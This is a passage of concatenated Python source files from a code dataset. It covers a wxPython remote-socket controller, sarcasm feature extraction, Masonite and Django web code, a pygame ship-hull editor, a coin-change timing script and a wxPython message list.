sockets['1111100010'] == '10':\n self.button_livingroom.SetValue(True)\n\n def OnBtnBack(self, event):\n self.Close()\n event.Skip()\n\n def OnBtnAquarium(self, event):\n if self.button_aquarium.GetValue():\n os.system('cd /home/frank/Projekte/xbWeatherSocket/RCSwitch; ./rcswitch 111111000010')\n else:\n os.system('cd /home/frank/Projekte/xbWeatherSocket/RCSwitch; ./rcswitch 111111000001')\n\n def OnBtnBedroom(self, event):\n if self.button_bedroom.GetValue():\n os.system('cd /home/frank/Projekte/xbWeatherSocket/RCSwitch; ./rcswitch 111110100010')\n else:\n os.system('cd /home/frank/Projekte/xbWeatherSocket/RCSwitch; ./rcswitch 111110100001')\n\n def OnBtnKitchen(self, event):\n if self.button_kitchen.GetValue():\n os.system('cd /home/frank/Projekte/xbWeatherSocket/RCSwitch; ./rcswitch 111110010010')\n else:\n os.system('cd /home/frank/Projekte/xbWeatherSocket/RCSwitch; ./rcswitch 111110010001')\n\n def OnBtnLivingroom(self, event):\n if self.button_kitchen.GetValue():\n os.system('cd /home/frank/Projekte/xbWeatherSocket/RCSwitch; ./rcswitch 111110001010')\n else:\n os.system('cd /home/frank/Projekte/xbWeatherSocket/RCSwitch; ./rcswitch 111110001001')\n\nclass MyApp(wx.App):\n \"\"\"\n Here we start the App with the Main frame.\n \"\"\"\n # noinspection PyPep8Naming\n def OnInit(self):\n \"\"\"\n Start MyMainFrame as the TopWindow.\n :return: True\n \"\"\"\n wx.InitAllImageHandlers()\n frame_main = MyMainFrame(None, wx.ID_ANY, \"\")\n self.SetTopWindow(frame_main)\n frame_main.Show()\n return 1\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.ERROR)\n app = MyApp(0)\n app.MainLoop()\n\n\n","sub_path":"xbWeatherSock.py","file_name":"xbWeatherSock.py","file_ext":"py","file_size_in_byte":16901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"582077248","text":"# coding: utf-8\nimport nltk\nimport string\nimport numpy as np\nfrom topic import topic\nfrom nltk.stem import WordNetLemmatizer\nfrom textblob.blob import TextBlob\n\nlemmatizer = WordNetLemmatizer()\n\npunctuations = set(string.punctuation)\n\nhappy = set([':-)', ':)', '(:', '=)', ':-d', ':d', '=d', 'xd', 'd=', 'd;', 'd:', 'dx', ';-)', ';d', ';)', ':-p', ':p', 'xp', 'x-p', '=p', '>:-)', \n\t'>:)', 'o:-)', 'o:)', '0:-)', '0:)', 'b)',\n 'bd', 'b-)', 'b-d', '( ͡° ͜ʖ ͡°)'])\n\nsad = set([':-(', ':(', '):', '=(', '(´・ω・`)', '(`・ω・´)', '(・ω・)'])\n\ncute = set([\":3\", \"=3\"])\n\t\t\t\nsurprised = set([':o', ':-o'])\n\nlove = set([':*', ':-*'])\n\nindifferent = set([':-/', ':/', '=/',\n ':-\\ ', ':\\ ', '=\\ ', ':l', '=l', ':-|', ':|', '-_-', \n '¯\\_(ツ)_/¯'])\n\n# list of intensifiers that could be used in sarcastic text\nintensifiers = set(['already', 'bleeping', 'bloody', 'dafuq', 'damn', 'dickens', 'downright', 'effing', 'ever',\n 'everliving', 'everloving', 'flipping', 'freaking', 'fricking', 'frigging', 'fuck', 'fucking', 'hell',\n 'hella', 'holy', 'motherfreaking', 'motherfucking', 'on earth', 'precious', 'heck', 'well'])\n\n# list of interjections that could be used in sarcastic text\ninterjections = set(['absolutely', 'ahh', 'aha', 'ahem', 'ahoy', 'agreed', 'alas', 'alright', 'alrighty', 'amen', 'anytime',\n 'argh', 'anyhow', 'as if', 'attaboy', 'attagirl', 'aww', 'bam', 'behold', 'bingo', 'blah', 'bless you',\n 'bravo', 'cheers', 'darn', 'dang', 'doh', 'duh', 'eh', 'gee', 'geepers', 'golly', 'goodness',\n 'goodness gracious', 'gosh', 'ha', 'hallelujah', 'hey', 'hmmm', 'huh', 'indeed', 'jeez', 'my gosh',\n 'no', 'now', 'nah', 'oops', 'ouch', 'phew', 'please', 'shoot', 'shucks', 'there', 'uggh', 'waa',\n 'what', 'woah', 'woops', 'wow', 'yay', 'yes', 'yikes'])\n\ndef replace(comment):\n\tnew_comment = comment\n\tfor em in happy:\n\t\tnew_comment = new_comment.replace(em, \"happy\")\n\tfor em in sad:\n\t\tnew_comment = new_comment.replace(em, \"sad\")\n\tfor em in cute:\n\t\tnew_comment = new_comment.replace(em, \"cute\")\n\tfor em in surprised:\n\t\tnew_comment = new_comment.replace(em, \"surprised\")\n\tfor em in love:\n\t\tnew_comment = new_comment.replace(em, \"love\")\n\tfor em in indifferent:\n\t\tnew_comment = new_comment.replace(em, \"indifferent\")\n\n\treturn new_comment\n\n\ndef get_exclaimation_count(features, comment):\n\tfeatures['exclaimation'] = comment.count('!')\n\ndef get_capital_count(features, comment):\n\tcount = 0\n\tfor word in comment:\n\t\tif word.isupper():\n\t\t\tcount += 1\n\tfeatures['capital'] = count\n\ndef get_intensifier_count(features, comment):\n\tcount = 0\n\tfor word in comment:\n\t\tif word not in punctuations:\n\t\t\tcount += 1\n\tfeatures['intensifiers'] = count\n\ndef get_injection_count(features, comment):\n\tcount = 0\n\tfor word in comment:\n\t\tif word not in punctuations:\n\t\t\tcount += 1\n\tfeatures['interjections'] = count\n\ndef get_emoji_count(features, comment):\n\tcount = 0\n\tfor word in comment:\n\t\tif word in happy or word in sad or word in cute or word in surprised or word in love or word in indifferent:\n\t\t\tcount += 1\n\tfeatures['emoticons'] = count\n\ndef get_grams(features, comment):\n\ttokens = nltk.word_tokenize(comment)\n\tunigrams = [lemmatizer.lemmatize(token) for token in tokens]\n\tbigrams = nltk.bigrams(unigrams)\n\tbigrams = [bigram[0] + \" \" + bigram[1] for bigram in bigrams]\n\tgrams = unigrams + bigrams\n\tfor gram in grams:\n\t\tfeatures['contains(%s)' % gram] = True\n\ndef get_pos(features, comment):\n\tpos_dic = {'NN': 0, 'JJ': 0, 'VB': 0, 'RB' : 0}\n\ttokens = nltk.word_tokenize(comment)\n\ttokens = [token.lower() for token in tokens]\n\tpos = nltk.pos_tag(tokens)\n\n\tfor x in xrange(len(pos)):\n\t\ttag = pos[x][1]\n\t\tif tag[0:2] == 'NN':\n\t\t\tpos_dic['NN'] += 1\n\t\telif tag[0:2] == 'JJ':\n\t\t\tpos_dic['JJ'] += 1\n\t\telif tag[0:2] == 'VB':\n\t\t\tpos_dic['VB'] += 1\n\t\telif tag[0:2] == 'RB':\n\t\t\tpos_dic['RB'] += 1\n\n\tfor key, value in pos_dic.items():\n\t\tfeatures['POS ' + key] = value\n\n\ndef get_topic(features, comment, model):\n topics = model.get_topics(comment)\n for j in xrange(len(topics)):\n features['Topic'] = topics[j][1]\n\n\ndef get_subjectivity_score(feat, text):\n '''\n 0 = very objective\n 1 = very subjective\n '''\n try:\n blob = TextBlob(text.strip())\n feat['subjectivity'] = blob.sentiment.subjectivity\n except:\n feat['subjectivity'] = 0.0\n\ndef get_polarity_score(feat, text):\n '''\n -1 = very negative\n 1 = very positive\n '''\n try:\n blob = TextBlob(text.strip())\n feat['polarity'] = blob.sentiment.polarity\n except:\n feat['polarity'] = 0.0\n\ndef get_average_contrast(feat, text):\n '''\n 0 = no contrast\n 1 = high contrast\n '''\n negCount = 0\n posCount = 0\n negTotal = 0.0\n posTotal = 0.0\n polarityTemp = 0.0\n polarityDif = 0.0\n try:\n blob = TextBlob(text.strip())\n for sentence in blob.sentences:\n polarityTemp = sentence.sentiment.polarity\n if polarityTemp < 0:\n negTotal += polarityTemp\n negCount += 1\n elif polarityTemp > 0:\n posTotal += polarityTemp\n posCount += 1\n if negCount > 0:\n if posCount > 0:\n polarityDif = ((posTotal / posCount) - (negTotal / negCount)) / 2\n feat['average_contrast'] = polarityDif\n except:\n feat['average_contrast'] = 0.0\n\ndef get_extreme_contrast(feat, text):\n '''\n 0 = no contrast\n 1 = high contrast\n '''\n minPolarity = 0.0\n maxPolarity = 0.0\n polarityTemp = 0.0\n try:\n blob = TextBlob(text.strip())\n for sentence in blob.sentences:\n polarityTemp = sentence.sentiment.polarity\n if polarityTemp > maxPolarity:\n maxPolarity = polarityTemp\n elif polarityTemp < minPolarity:\n minPolarity = polarityTemp\n feat['extreme_contrast'] = (maxPolarity - minPolarity)/2\n except:\n feat['extreme_contrast'] = 0.0\n\ndef get_half_contrast(feat, text):\n '''\n 0 = no difference in polarity\n 1 = high difference in polarity\n '''\n first_half_polarity = 0.0\n second_half_polarity = 0.0\n tokens = nltk.word_tokenize(text, language = 'english', preserve_line = False)\n if len(tokens) == 1:\n feat['half_contrast'] = 0.0\n else:\n first_half = tokens[0: int(len(tokens)/2)]\n second_half = tokens[int(len(tokens)/2):]\n \n try:\n blob = TextBlob(\"\".join([\" \"+i if i not in string.punctuation else i for i in first_half]).strip())\n first_half_polarity = blob.sentiment.polarity\n except:\n first_half_polarity = 0.0\n \n try:\n blob = TextBlob(\"\".join([\" \"+i if i not in string.punctuation else i for i in second_half]).strip())\n second_half_polarity = blob.sentiment.polarity\n except:\n second_half_polarity = 0.0\n \n feat['half_contrast'] = np.abs(first_half_polarity - second_half_polarity) / 2\n\ndef get_third_contrast(feat, text):\n '''\n 0 = no difference in polarity\n 1 = high difference in polarity\n '''\n first_half_polarity = 0.0\n second_half_polarity = 0.0\n third_half_polarity = 0.0\n tokens = nltk.word_tokenize(text, language = 'english', preserve_line = False)\n if len(tokens) < 2:\n feat['third_contrast_12'] = 0.0\n feat['third_contrast_13'] = 0.0\n feat['third_contrast_23'] = 0.0\n elif len(tokens) == 2:\n try:\n blob = TextBlob(tokens[0])\n first_half_polarity = blob.sentiment.polarity\n except:\n first_half_polarity = 0.0\n try:\n blob = TextBlob(tokens[1])\n second_half_polarity = blob.sentiment.polarity\n except:\n second_half_polarity = 0.0\n feat['third_contrast_13'] = 0.0\n feat['third_contrast_23'] = 0.0\n feat['third_contrast_12'] = np.abs(first_half_polarity - second_half_polarity) / 2\n else:\n first_half = tokens[0: int(len(tokens)/3)]\n second_half = tokens[int(len(tokens)/3): 2*int(len(tokens)/3)]\n third_half = tokens[2*int(len(tokens)/3):]\n try:\n blob = TextBlob(first_half)\n first_half_polarity = blob.sentiment.polarity\n except:\n first_half_polarity = 0.0\n try:\n blob = TextBlob(second_half)\n second_half_polarity = blob.sentiment.polarity\n except:\n second_half_polarity = 0.0\n try:\n blob = TextBlob(third_half)\n third_half_polarity = blob.sentiment.polarity\n except:\n third_half_polarity = 0.0\n feat['third_contrast_12'] = np.abs(first_half_polarity - second_half_polarity) / 2\n feat['third_contrast_13'] = np.abs(first_half_polarity - third_half_polarity) / 2\n feat['third_contrast_23'] = np.abs(second_half_polarity - third_half_polarity) / 2\n\n\ndef get_features(comment, model):\n\tfeatures = {}\n\tget_exclaimation_count(features, comment)\n\tget_capital_count(features, comment)\n\tget_intensifier_count(features, comment)\n\tget_injection_count(features, comment)\n\tget_emoji_count(features, comment)\n\tcomment = replace(comment)\n\tget_grams(features, comment)\n\tget_pos(features, comment)\t\n\tget_topic(features, comment, model)\n\tget_subjectivity_score(features, comment)\n\tget_polarity_score(features, comment)\n\tget_average_contrast(features, comment)\n\tget_extreme_contrast(features, comment)\n\tget_half_contrast(features, comment)\n\tget_third_contrast(features, comment)\n\treturn features\n\t\n\n","sub_path":"SVM/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":9637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"218530202","text":"\"\"\" A StartResponseProvider Service Provider \"\"\"\n\nfrom masonite.exceptions import ResponseError\nfrom masonite.provider import ServiceProvider\n\n\nclass StartResponseProvider(ServiceProvider):\n\n def register(self):\n pass\n\n def boot(self, Request, Response, Headers):\n if not Request.redirect_url:\n # Convert the data that is retrieved above to bytes\n # so the wsgi server can handle it.\n try:\n data = bytes(Response, 'utf-8')\n except TypeError:\n raise ResponseError(\n 'An acceptable response type was not returned')\n\n self.app.bind('StatusCode', Request.get_status_code())\n Headers += [\n (\"Content-Length\", str(len(data)))\n ] + Request.get_cookies() + Request.get_headers()\n else:\n self.app.bind('StatusCode', \"302 OK\")\n self.app.bind('Headers', [\n ('Location', Request.redirect_url)\n ] + Request.get_cookies())\n\n Request.reset_redirections()\n\n self.app.bind('Response', 'redirecting ...')\n\n Request.url_params = {}\n Request.reset_headers()\n Request.cookies = []\n if self.app.has('Session') and self.app.make('StatusCode') == '200 OK':\n self.app.make('Session').reset(flash_only=True)\n","sub_path":"masonite/providers/StartResponseProvider.py","file_name":"StartResponseProvider.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"54653361","text":"from django.shortcuts import render, redirect\nfrom django.http import JsonResponse\nfrom ..loginApp.models import User\nfrom .models import Job\nfrom django.contrib import messages\n\n# CRUD\n\ndef addToDB(title, description, location, id_user):\n\n job = Job.objects.create(\n title = title,\n description = description,\n location = location,\n job_posted_by = User.objects.get(id = id_user),\n )\n\n return job\n\n\ndef updateOnDB(title, description, location, id_job):\n\n print(description)\n print(location)\n\n job = Job.objects.get(id = id_job)\n job.title = title\n job.description = description\n job.location = location\n job.save()\n\n return job\n\n\ndef removeFromDB(id_job):\n \n job = Job.objects.get(id = id_job)\n job.delete()\n\n return True\n\n\ndef addToMyListDB(id_job,id_user):\n\n job = Job.objects.get(id = id_job)\n user = User.objects.get(id = id_user)\n\n job.job_taken_by = user\n job.save()\n\n return job\n\n\n\n# ROUTES\ndef gotoDashboard(request):\n\n if not 'id' in request.session or request.session['id'] == 0:\n return redirect('signin')\n\n context = {\n 'user' : User.objects.get(id = request.session['id']),\n 'jobs' : Job.objects.filter(job_taken_by__isnull=True),\n #myjobs = user.taken_jobs.all\n }\n\n return render(request,'index.html',context)\n\n\ndef gotoAddJob(request):\n\n if not 'id' in request.session or request.session['id'] == 0:\n return redirect('signin')\n\n context = {\n 'tipo' : 'add',\n }\n\n return render(request,'addOrEditJob.html',context) \n\ndef createJob(request):\n\n if not 'id' in request.session or request.session['id'] == 0:\n return redirect('signin')\n\n if request.method == \"POST\":\n errors = Job.objects.job_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value) \n\n job = Job(\n title = request.POST['title'],\n description = request.POST['description'],\n location = request.POST['location'],\n )\n\n context = {\n 'job' : job,\n 'tipo' : 'add',\n }\n \n return render(request,'addOrEditJob.html',context) #go back to \"addJob/create\"\n\n else:\n\n job = addToDB(\n title = request.POST['title'],\n description = request.POST['description'],\n location = request.POST['location'],\n id_user = request.session['id'],\n )\n\n messages.success(request, f\"[Id.{job.id}] {job.title} successfully added to list of available jobs!\")\n \n return redirect('dashboard')\n\n\ndef gotoEditJob(request,id_job):\n\n if not 'id' in request.session or request.session['id'] == 0:\n return redirect('signin')\n\n job = Job.objects.get(id = id_job)\n\n user = User.objects.get(id = request.session['id'])\n \n if user.id != job.job_posted_by.id:\n return redirect('dashboard')\n\n context = {\n 'job' : job,\n 'tipo' : 'edit',\n }\n \n return render(request,'addOrEditJob.html',context) \n\n\ndef updateJob(request,id_job):\n\n if not 'id' in request.session or request.session['id'] == 0:\n return redirect('signin')\n\n job = Job.objects.get(id = id_job)\n\n if request.session['id'] != job.job_posted_by.id:\n return redirect('dashboard') \n\n if request.method == \"POST\":\n errors = Job.objects.job_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value) \n\n job = Job(\n title = request.POST['title'],\n description = request.POST['description'],\n location = request.POST['location'],\n id = id_job,\n )\n\n context = {\n 'job' : job,\n 'tipo' : 'edit',\n }\n \n return render(request,'addOrEditJob.html',context) #go back to \"addJob/create\"\n\n else:\n\n job = updateOnDB(\n title = request.POST['title'],\n description = request.POST['description'],\n location = request.POST['location'],\n id_job = id_job,\n )\n\n messages.success(request, f\"[Id.{job.id}] {job.title} successfully updated!\")\n\n return redirect('dashboard') \n \n\n\ndef viewJob(request,id_job):\n\n if not 'id' in request.session or request.session['id'] == 0:\n return redirect('signin')\n\n context = {\n 'job' : Job.objects.get(id = id_job)\n }\n return render(request,'viewJob.html',context) \n\n\ndef addToMyJobs(request,id_job):\n\n if not 'id' in request.session or request.session['id'] == 0:\n return redirect('signin')\n \n if len(Job.objects.filter(id = id_job,job_taken_by__isnull = True)) > 0:\n id_user = request.session['id']\n job = addToMyListDB(id_job,id_user)\n messages.success(request, f\"[Id.{job.id}] {job.title} successfully added to My List of Jobs!\")\n\n return redirect('dashboard')\n\n\ndef deleteJob(request,id_job):\n\n if not 'id' in request.session or request.session['id'] == 0:\n return redirect('signin')\n\n job = Job.objects.get(id = id_job)\n job_title = job.title \n\n if job.job_taken_by and job.job_taken_by.id == request.session['id']:\n removeFromDB(id_job)\n messages.success(request, f\"[Id.{id_job}] {job_title} done and removed from My Jobs!\")\n elif job.job_posted_by.id == request.session['id']:\n removeFromDB(id_job)\n messages.warning(request, f\"[Id.{id_job}] {job_title} cancelled!\")\n\n return redirect('dashboard')","sub_path":"apps/myApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"598984124","text":"import pygame\n\nimport sys\nimport xml.etree.ElementTree as ET\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\nGRID_STEP = 25\n\n# pygame initialization\npygame.init()\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\npygame.display.set_caption(\"LoneStar ShipDraw\")\ndone = False\n\ndrawgrid = True\n\nshiphull = []\nscaledhullpoints = []\ndrawingHull = True\n\n# handle mouse clicks\ndef clicked(event):\n global drawingHull\n global shiphull\n global scaledhullpoints\n \n if drawingHull:\n hullpos = tuple(round(i / GRID_STEP) for i in event.pos)\n \n if len(shiphull) == 0:\n shiphull.append(hullpos)\n else:\n shiphull = shiphull + hullPath(hullpos)[1:]\n \n if len(shiphull) > 1 and shiphull[-1] == shiphull[0]:\n drawingHull = False\n scaledhullpoints = [(p[0] * GRID_STEP, p[1] * GRID_STEP) for p in shiphull]\n \n# draw the ship's outline while hull-drawing is occuring\ndef drawOutline(hull, preview):\n for i in range(1, len(hull)):\n hullPos = (hull[i][0] * GRID_STEP, hull[i][1] * GRID_STEP)\n prevhullPos = (hull[i - 1][0] * GRID_STEP, hull[i - 1][1] * GRID_STEP)\n \n if preview:\n pygame.draw.line(screen, (150,150,150), hullPos, prevhullPos, 3)\n else:\n pygame.draw.line(screen, (0,0,0), hullPos, prevhullPos, 3)\n \n# get point neighbors\ndef pointNeighbors(pos):\n neighbors = [\n (pos[0], pos[1] - 1),\n (pos[0] - 1, pos[1]),\n (pos[0] + 1, pos[1]),\n (pos[0], pos[1] + 1),\n (pos[0] - 1, pos[1] - 1),\n (pos[0] + 1, pos[1] - 1),\n (pos[0] - 1, pos[1] + 1),\n (pos[0] + 1, pos[1] + 1)\n ]\n \n return neighbors\n \n# return true if the point lies in bounds, false otherwise\ndef validPoint(pos):\n if (pos[0] < 0 or pos[0] > SCREEN_WIDTH / GRID_STEP):\n return False\n \n if (pos[1] < 0 or pos[1] > SCREEN_HEIGHT / GRID_STEP):\n return False\n \n if inList([shiphull[i] for i in range(2, len(shiphull))], pos):\n return False\n \n return True\n \n \n# draw hull cursor\ndef hullCursor(pos):\n posX = pos[0] * GRID_STEP\n posY = pos[1] * GRID_STEP\n \n pygame.draw.circle(screen, (255,0,0), (posX, posY), 3)\n pygame.draw.circle(screen, (255,255,255), (posX, posY), 5, 1)\n \n# check whether a point is in a point list\ndef inList(list, point):\n for p in list:\n if p == point:\n return True\n \n return False\n \n# find the shortest grid path from the most recent point in the path to a new point\n# point is the goal point\ndef hullPath(point):\n queue = [[shiphull[-1]]]\n visited = [shiphull[-1]]\n \n while len(queue):\n curpath = queue.pop(0)\n \n if curpath[-1] == point:\n return curpath\n \n for p in pointNeighbors(curpath[-1]):\n if validPoint(p) and not inList(visited, p):\n queue.append(curpath + [p])\n visited.append(p)\n \n return []\n \n# determine whether or not the user can save the ship they've drawn\n# the ship must have a finished hull\ndef canSaveShip():\n if drawingHull:\n print(\"You must finish drawing a hull before saving.\")\n return False\n \n return True\n \n# export the drawn ship to an XML file for import into LoneStar\ndef saveShip():\n if not canSaveShip():\n return\n \n ship = ET.Element('ship')\n \n hull = ET.SubElement(ship, 'hull')\n \n # add hull data to ship xml\n for wallpoint in shiphull:\n hullwall = ET.SubElement(hull, 'wall')\n hullwall.set('type', 'default')\n hullwall.set('posX', str(wallpoint[0]))\n hullwall.set('posY', str(wallpoint[1]))\n \n \n # write the ship to the file\n data = ET.tostring(ship, encoding='unicode')\n file = open(\"Ships/\" + sys.argv[1] + \".ship\", \"w\")\n file.write(data)\n \n print(\"Ship '\" + sys.argv[1] + \"' saved!\")\n\n\n# main shipdraw loop\nwhile not done:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_g:\n # toggle grid\n drawgrid = not drawgrid\n if event.key == pygame.K_s:\n # save the ship\n saveShip()\n elif event.key == pygame.K_ESCAPE:\n # quit ShipDraw\n done = True\n elif event.type == pygame.MOUSEBUTTONDOWN:\n # handle mouse clicks\n clicked(event)\n \n # draw background\n screen.fill((220,220,220))\n \n unitMousePos = tuple(round(i / GRID_STEP) for i in pygame.mouse.get_pos())\n \n # draw grid cursor for both the mouse position and last placed hull point\n # also draw preview to next point\n if drawingHull:\n drawOutline(shiphull, False)\n\n hullCursor(unitMousePos)\n if len(shiphull) > 0:\n hullCursor(shiphull[-1])\n \n # draw path preview\n drawOutline(hullPath(unitMousePos), True)\n else:\n pygame.draw.polygon(screen, (200,200,200), scaledhullpoints)\n pygame.draw.polygon(screen, (0,0,0), scaledhullpoints, 3)\n \n # draw point grid\n if drawgrid:\n for x in range(0, SCREEN_WIDTH + 1, GRID_STEP):\n for y in range(0, SCREEN_HEIGHT + 1, GRID_STEP):\n pygame.draw.circle(screen, (100,100,100), (x, y), 2)\n \n if drawingHull:\n hullCursor(unitMousePos)\n\n pygame.display.flip()","sub_path":"utils/shipdraw/shipdraw.py","file_name":"shipdraw.py","file_ext":"py","file_size_in_byte":5582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"329672520","text":"from time import time\nimport sys\n\ncoins = []\noutput = False\n# dataset format: \"50, 1, 20, 50, 2\"\nf = open(sys.argv[1], 'r').read().split(\",\")\nfor num in f:\n coins.append(int(num))\nprint(\"Available coins:\", coins)\n\n\ndef find_coin_greedy(v):\n ans = []\n # take the biggest coin available, sorting and reversing iteration\n coins_sorted = sorted(coins)\n for coin in reversed(coins_sorted):\n while v >= coin:\n v = v - coin\n ans.append(coin)\n if output:\n print(\" Returned coins:\", ans)\n\n\ndef find_coin_brutal(v):\n ans = []\n for coin in coins:\n while v >= coin:\n v = v - coin\n ans.append(coin)\n if output:\n print(\" Returned coins:\", ans)\n\n\nif len(sys.argv) == 3 and sys.argv[2] == \"-o\":\n output = True\nn = int(input(\"Money to exchange (in cents): \"))\nstartTime = time()\nfind_coin_brutal(n)\nelapsedTime = time() - startTime\nprint(\" Brutal Force:\", elapsedTime, \"seconds\")\nstartTime = time()\nfind_coin_greedy(n)\nelapsedTime = time() - startTime\nprint(\" Greedy:\", elapsedTime, \"seconds\")\n","sub_path":"coins.py","file_name":"coins.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"41908507","text":"# Start the imports\r\n\r\nimport os\r\nimport wx\r\n\r\nimport extern.ultimatelistctrl as ULC\r\nimport extern.listctrl as listmix\r\n\r\nfrom utilities import shortNow\r\nfrom constants import _iconMapper, _messageImageList, _messageColumnNames\r\n\r\n\r\nclass MessageWindow(ULC.UltimateListCtrl, listmix.ListCtrlAutoWidthMixin):\r\n\r\n def __init__(self, parent, columnNames=_messageColumnNames, images=_messageImageList):\r\n \"\"\"\r\n Default class constructor.\r\n\r\n :param `parent`: the parent widget\r\n :param `columnNames`: the list control column names\r\n \"\"\"\r\n\r\n ULC.UltimateListCtrl.__init__(self, parent, -1, style=wx.SUNKEN_BORDER, agwStyle=wx.LC_REPORT|wx.LC_HRULES|wx.LC_VRULES|wx.LC_VIRTUAL)\r\n\r\n # Initialize the auto width mixin. We always need it \r\n listmix.ListCtrlAutoWidthMixin.__init__(self)\r\n self.MainFrame = wx.GetTopLevelParent(self)\r\n\r\n self.popupId1, self.popupId2 = wx.NewId(), wx.NewId()\r\n self.messages = []\r\n self.textColour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_LISTBOXTEXT)\r\n\r\n self.EnableSelectionVista()\r\n \r\n # Do the hard work\r\n self.BuildImageList(images)\r\n self.InsertColumns(columnNames)\r\n self.BindEvents()\r\n\r\n self.SetItemCount(200)\r\n\r\n\r\n # ========================== #\r\n # Methods called in __init__ #\r\n # ========================== #\r\n \r\n def InsertColumns(self, columnNames):\r\n \"\"\" Inserts the columns in the list control. \"\"\"\r\n\r\n # The first column is always empty text, as I use it to display\r\n # an informative/fancy icon\r\n self.InsertColumn(0, \"\")\r\n\r\n # Loop over all the column names \r\n for indx, column in enumerate(columnNames):\r\n self.InsertColumn(indx+1, column)\r\n self.SetColumnWidth(indx+1, wx.LIST_AUTOSIZE_USEHEADER)\r\n\r\n # The first column only displays an icon, 24 is perfect on Windows\r\n self.SetColumnWidth(0, 24)\r\n\r\n\r\n def BuildImageList(self, images):\r\n \"\"\" Build the image list for the list control. \"\"\"\r\n \r\n # Ok, here it gets tricky as I am trying to re-use the same base class\r\n # for 6 or more different list control\r\n imgList = wx.ImageList(16, 16)\r\n\r\n # Loop over all the images in the list\r\n for png in images:\r\n imgList.Add(self.MainFrame.CreateBitmap(png))\r\n\r\n # Assign the image list, I don't want to store it \r\n self.AssignImageList(imgList, wx.IMAGE_LIST_SMALL) \r\n \r\n \r\n def BindEvents(self):\r\n \"\"\" Bind the events for the list control. \"\"\"\r\n\r\n self.Bind(wx.EVT_LIST_COL_RIGHT_CLICK, self.OnRightClick)\r\n self.Bind(wx.EVT_LIST_ITEM_RIGHT_CLICK, self.OnRightClick)\r\n self.Bind(wx.EVT_LIST_COL_BEGIN_DRAG, self.OnColumnDrag)\r\n\r\n self.Bind(wx.EVT_MENU, self.OnExportMessages, id=self.popupId1)\r\n self.Bind(wx.EVT_MENU, self.OnHistoryClear, id=self.popupId2)\r\n\r\n\r\n def OnColumnDrag(self, event):\r\n \"\"\" Handles the wx.EVT_LIST_COL_BEGIN_DRAG event for the list control. \"\"\"\r\n\r\n if event.GetColumn() == 0:\r\n # Veto the event for the first column, it holds the icon\r\n event.Veto()\r\n return\r\n\r\n event.Skip()\r\n\r\n\r\n def OnRightClick(self, event):\r\n \"\"\"\r\n Handles the wx.EVT_LIST_COL_RIGHT_CLICK/wx.EVT_LIST_ITEM_RIGHT_CLICK\r\n event for the list control.\r\n \"\"\"\r\n\r\n menu = wx.Menu()\r\n\r\n item = wx.MenuItem(menu, self.popupId1, \"Export messages\")\r\n bmp = self.MainFrame.CreateBitmap(\"export\")\r\n item.SetBitmap(bmp)\r\n menu.AppendItem(item) \r\n\r\n item = wx.MenuItem(menu, self.popupId2, \"Clear history\")\r\n bmp = self.MainFrame.CreateBitmap(\"history_clear\")\r\n item.SetBitmap(bmp)\r\n menu.AppendItem(item) \r\n\r\n # Popup the menu. If an item is selected then its handler\r\n # will be called before PopupMenu returns.\r\n self.PopupMenu(menu)\r\n\r\n\r\n def OnHistoryClear(self, event):\r\n \"\"\" Handles the wx.EVT_MENU event for the list control. \"\"\"\r\n\r\n # Freeze everything... It helps with flicker\r\n self.Freeze()\r\n # Delete all the items, the user cleared all\r\n self.DeleteAllItems()\r\n\r\n self.messages = []\r\n self.SetItemCount(200)\r\n \r\n # Time to warm up\r\n self.Thaw()\r\n \r\n\r\n def OnExportMessages(self, event):\r\n\r\n pass\r\n \r\n\r\n # ================= #\r\n # Auxiliary methods #\r\n # ================= #\r\n\r\n \r\n def SendMessage(self, kind, message):\r\n \"\"\" Prints an user-friendly message on the list control. \"\"\"\r\n\r\n messages = [msg[2] for msg in self.messages]\r\n \r\n lenMess = len(self.messages)\r\n itemCount = self.GetItemCount()\r\n \r\n if lenMess == itemCount-1:\r\n self.SetItemCount(itemCount+200)\r\n\r\n # Get the current time slightly dirrently formatted\r\n currentTime = shortNow()\r\n\r\n self.messages.append((kind, currentTime, message)) \r\n \r\n # Ensure the last item is visible\r\n if lenMess > 3:\r\n self.EnsureVisible(lenMess)\r\n \r\n self.Refresh()\r\n self.Update()\r\n\r\n\r\n def OnGetItemText(self, item, col):\r\n\r\n lenMess = len(self.messages)\r\n\r\n if lenMess == 0 or col == 0 or item >= lenMess:\r\n return \"\"\r\n\r\n return self.messages[item][col]\r\n \r\n\r\n def OnGetItemImage(self, item):\r\n\r\n lenMess = len(self.messages)\r\n\r\n if lenMess == 0 or item >= lenMess:\r\n return []\r\n\r\n kind = self.messages[item][0]\r\n return _iconMapper[kind]\r\n\r\n\r\n def OnGetItemTextColour(self, item, col):\r\n\r\n return self.textColour\r\n \r\n\r\n def OnGetItemToolTip(self, item, col):\r\n\r\n return \"\"\r\n\r\n","sub_path":"messagewindow.py","file_name":"messagewindow.py","file_ext":"py","file_size_in_byte":5935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"1858587","text":"import contextlib\nwith contextlib.redirect_stdout(None): # Remove pygame prints during import\n import pygame\n from pygame.locals import *\nimport colorama\nfrom colorama import Cursor\nimport argparse as arg\n\nfrom graphics import Graphics\nfrom world 